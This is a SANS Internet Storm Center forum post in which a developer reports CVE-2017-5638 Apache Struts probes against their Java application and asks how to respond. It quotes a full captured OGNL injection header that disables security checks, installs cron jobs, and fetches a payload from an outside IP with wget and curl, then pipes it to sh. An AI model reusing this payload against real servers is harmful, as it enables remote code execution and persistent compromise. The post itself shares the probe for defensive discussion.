Threat Level: green Handler on Duty: Russ McRee

SANS ISC: CVE-2017-5638 probe - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
CVE-2017-5638 probe
I have a locally written java application that I maintain which is being hit by CVE-2017-5638 probes. It does not use struts but the probes happen to trigger an internal consistency check so I get an email each time.

Its at quite a low rate (I see about 1 a day across a number of instances) for example this mornings was

Date: 05-Oct-2017 08:30:14
IP Address: 5.188.10.250
Headers:
host = **removed**
, connection = 'keep-alive'
, accept-encoding = 'gzip, deflate'
, accept = '*/*'
, user-agent = 'Mozilla/5.0'
, content-type = '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance

(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg|sh\n*/19 * * * * curl

http://5.188.87.11/icons/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.11/icons/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty

('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).

(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).

(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}'


Clearly there is some kind of payload or C&C at http://5.188.87.11/icons/logo.jpg (I've not looked)
Whats the correct response when you start seeing something like this.
Anonymous

Sign Up for Free or Log In to start participating in the conversation!